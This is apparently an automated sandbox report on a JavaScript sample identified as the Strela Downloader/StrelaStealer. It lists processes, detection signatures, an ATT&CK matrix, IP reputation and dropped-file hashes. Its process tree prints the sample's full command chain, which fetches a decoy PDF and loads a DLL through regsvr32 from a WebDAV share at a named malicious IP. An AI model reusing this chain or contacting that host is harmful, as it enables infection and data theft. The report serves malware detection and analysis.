Windows
Analysis Report
3048426634198639173.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 964 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\30484 2663419863 9173.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6052 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\320 1529962252 52.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3404 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 5552 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 4180 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7312 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 12 --field -trial-han dle=1628,i ,463961882 2072123866 ,163620956 9569580900 8,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 5140 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588535 |
Start date and time: | 2025-01-11 02:09:38 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 5s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 3048426634198639173.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 172.64.41.3, 162.159.61.3, 23.209.209.135, 2.23.242.162, 199.232.214.172, 2.16.168.107, 2.16.168.105, 23.55.243.72, 23.55.243.85, 23.55.243.68, 23.55.243.70, 23.55.243.75, 23.55.243.80, 23.55.243.74, 23.55.243.79, 23.55.243.73, 192.168.2.6, 13.107.246.45, 34.237.241.83, 20.12.23.50, 104.126.112.182
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, e8652.dscx.akamaiedge.net, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:10:35 | API Interceptor | |
20:10:39 | API Interceptor | |
20:10:39 | API Interceptor | |
20:10:47 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263023275689361 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0K:9JZj5MiKNnNhoxuH |
MD5: | 1E521A3D86898222525C92F5BD9996D4 |
SHA1: | 8344144843AD2511FCC6F1AD219BF955354C0C75 |
SHA-256: | 3F443943F7FC46042077C4C046D93F2C0BFBC590F80DCE6E86727ED3E8D1854E |
SHA-512: | CB506BF25204F6480D3CCB7CAEE0AEDE7C23339060825317D99E0BFC29237E294A4F46F84DC606D7297D4679A55749CB783B7F049A6ED3B7C2B467CDA1CEC865 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555576761069207 |
Encrypted: | false |
SSDEEP: | 1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL |
MD5: | FFF92A9FEBA741A9A889E0526A1E7C2E |
SHA1: | 5465B1F2A7B4C31AED98D06E6660E32C3B7F1135 |
SHA-256: | 0B9D004025F1A5B6BC42E667822CA95B3BE252EFCC817C6037E9B0B0A9317245 |
SHA-512: | 0AB816F9DC324C8F7B6204D2D7263881643B90AC5D9D62961B1098A9324E6ECC475B64DBF1FF4A256366D27620F315A0FDCE8938EEF9BE1481A0E18064C19CD6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07990327844772288 |
Encrypted: | false |
